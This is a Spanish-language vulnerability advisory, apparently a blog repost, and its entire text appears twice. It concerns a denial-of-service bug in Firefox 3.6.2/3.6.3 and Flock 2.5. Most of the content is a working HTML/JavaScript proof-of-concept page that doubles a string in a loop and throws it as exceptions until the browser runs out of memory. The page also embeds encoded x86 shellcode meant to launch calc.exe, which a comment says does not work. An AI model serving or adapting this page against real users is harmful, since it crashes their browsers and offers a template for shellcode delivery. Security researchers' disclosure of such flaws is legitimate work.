Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion DoS
12 abril 2010
##################################
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion error console DoS
URL del creador: http://www.mozilla.com
URL del creador: http://www.flock.com/
Reportado por: http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html
###################################
Firefox y Flock pueden ser colgados con una página con formato incorrecto, también intenta ver la consola de errores de Firefox y Flock debido a una excepcion no detectada y esto es un out of memory.
################
Versiones
################
firefox 3.6.2 and 3.6.3 vulnerable
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=557228
Flock 2.5 vulnerable
#################
Prueba de concepto
#################
<html>
<head>
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title>
</head>
<body onload="javascript:alert('Please Press Ctrl+Shift+J');">
<script language='JavaScript'>
var n=unescape('%uf1a4%u7ffd');
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!>
<!-- Shellcode calc.exe but does not work --!>
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');
for(var i=0;i<64;i++){
n=n+n;
document.write('<script>throw n+s;</scr'+'ipt>');
}
</script>
</head>
<body>
<center><h1> Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 </h1>
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affects Flock and Firefox.
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)</h3>
</center></body>
</html>
###################€nd ##########################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
---
Traducción por; cLimbo
---
thz Lost ;-)
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion error console DoS
URL del creador: http://www.mozilla.com
URL del creador: http://www.flock.com/
Reportado por: http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html
###################################
Firefox y Flock pueden ser colgados con una página con formato incorrecto, también intenta ver la consola de errores de Firefox y Flock debido a una excepcion no detectada y esto es un out of memory.
################
Versiones
################
firefox 3.6.2 and 3.6.3 vulnerable
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=557228
Flock 2.5 vulnerable
#################
Prueba de concepto
#################
<html>
<head>
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title>
</head>
<body onload="javascript:alert('Please Press Ctrl+Shift+J');">
<script language='JavaScript'>
var n=unescape('%uf1a4%u7ffd');
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!>
<!-- Shellcode calc.exe but does not work --!>
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');
for(var i=0;i<64;i++){
n=n+n;
document.write('<script>throw n+s;</scr'+'ipt>');
}
</script>
</head>
<body>
<center><h1> Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 </h1>
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affects Flock and Firefox.
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)</h3>
</center></body>
</html>
###################€nd ##########################
Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
---
Traducción por; cLimbo
---
thz Lost ;-)
Publicar un comentario